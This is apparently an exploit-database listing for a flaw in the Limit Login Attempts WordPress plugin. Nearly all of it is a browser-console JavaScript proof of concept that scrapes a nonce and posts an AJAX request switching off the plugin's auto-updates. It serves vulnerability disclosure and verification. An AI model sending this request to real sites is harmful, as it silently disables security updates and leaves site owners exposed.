Share
## https://sploitus.com/exploit?id=WPEX-ID:654BAD15-1C88-446A-B28B-5A412CC0399D
As an Admin, open the Limit Login Attempts page in WP Admin and run the following code in the browser console:

nonce = document.documentElement.innerHTML.match( /sec: '(\w+)'/ )[1];
await (await fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=toggle_auto_update&value=no&sec=" + nonce,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})).text();

Check and see that auto-updates have been disabled for the Limit Login Attempts plugin.